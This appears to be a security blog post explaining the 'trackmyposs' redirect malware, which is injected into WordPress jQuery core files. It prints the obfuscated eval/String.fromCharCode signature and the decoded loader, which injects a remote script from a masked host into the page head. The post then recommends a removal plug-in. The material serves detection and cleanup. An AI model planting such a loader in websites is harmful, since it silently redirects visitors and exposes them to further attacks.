Recently there has been an increase in the embedding of JAVASCRIPT-type malware starting with trackmyposs in WordPress core files.

What is the redirect hack in WordPress?

A redirect hack is a type of malware (malicious program) in which a hacker modifies some files in WordPress to force users to visit a different site.

The hacker takes advantage of a vulnerability in a program, such as a plugin, or by taking advantage of administrative privileges to rewrite a site’s files and embed these malware programs.

Embedding JAVASCRIPT-type malware starting with trackmyposs in core files

This malware inserts malicious code into the top of the following files included in WordPress.

/wp-includes/js/jquery/jquery.min.js
/wp-includes/js/jquery/jquery-migrate.min.js
Or JAVASCRIPT with the same file name above included in the theme or plugin

The incorrect code looks like the following

/*trackmyposs*/eval(String.fromCharCode( followed by a number

This code takes the program obfuscated by String.fromCharCode back to the original executable code and executes it with the eval function.

jquery.min.js and jquery-migrate.min.js may be loaded on all pages of a WordPress site, and when users access various pages of the site, they are executed and forced to go to another site.

Unobfuscated, the code will look like the following.

var d=document;var s=d.createElement('script'); s.id="trackmyposs";
s.src=https://********/robots.js?v=3.1.3; 
if (document.currentScript) { 
    document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
    d.getElementsByTagName('head') [0].appendChild(s); }
}

The ******** part contains the distribution source of the illegal file.

You can see that this code creates an embedded element of JAVASCRIPT and embeds the code for the malicious redirect hack pulled from the outside into the HEAD of the site to execute it.

Malware Detection and Removal

Free WordPress:Malware Scan & Security Plug-in [Malware and Virus Detection and Removal] will dry up and remove trackmyposs malware.

In addition, the fact that this malware is embedded means that there may be other backdoors embedded in the server because the hacker has taken administrative privileges or some other vulnerability.

It may be necessary to inspect all files on the server and remove the malware.